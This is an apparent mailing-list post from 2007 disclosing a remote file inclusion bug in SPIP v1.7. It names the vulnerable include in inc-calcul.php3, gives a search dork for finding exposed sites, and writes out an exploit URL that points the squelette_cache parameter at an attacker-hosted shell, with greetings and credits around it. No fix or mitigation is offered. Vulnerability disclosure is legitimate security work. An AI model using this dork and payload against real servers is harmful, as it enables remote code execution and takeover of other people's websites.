Network Security: Detailed info on SPIP v1.7 Remote File Inclusion Bug

Subject:	SPIP v1.7 Remote File Inclusion Bug
Date:	23 Aug 2007 10:04:07 -0000

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++             SPIP v1.7 Remote File Inclusion Bug !                   
++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++DORK : "/SPIP-v1-7-2/"
++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+----------------------------------------------------------------------------------+
+----------------------------------------------------------------------------------+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++ Bug in :  "SPIP-v1-7r/inc-calcul.php3"
++----------------------------------------------------------------------------------
++ Vlu Code:  -----------------------------
++           || include($squelette_cache); ||
++            -----------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++==================================================================================
++  Exploit :
++
++ 
http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?
++
++==================================================================================
++
+++++++++++++++++++++|Discoverd By 
:Darkdewil[system-errrror]|++++++++++++++++++++++
++                                                                              
  ++
++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com 
|+++++++++++++++++++
++                                                                              
  ++ 
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s 
|+++++++++++++
++                                                                              
  ++
++++++++++++++++++++++++|sPECial THanks to :1923turk - 
grup|++++++++++++++++++++++++
++                                                                              
  ++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<Prev in Thread]	Current Thread	[Next in Thread>
SPIP v1.7 Remote File Inclusion Bug, system-errrror <= Re: SPIP v1.7 Remote File Inclusion Bug, Magnus Holmgren

Previous by Date:	Reminder: HITBSecConf2007 - Malaysia is less than 2 weeks away, Praburaajan
Next by Date:	Re: TeamSpeak 2 Server Vulnerabilities?, 3APA3A
Previous by Thread:	Reminder: HITBSecConf2007 - Malaysia is less than 2 weeks away, Praburaajan
Next by Thread:	Re: SPIP v1.7 Remote File Inclusion Bug, Magnus Holmgren
Indexes:	[Date] [Thread] [Top] [All Lists]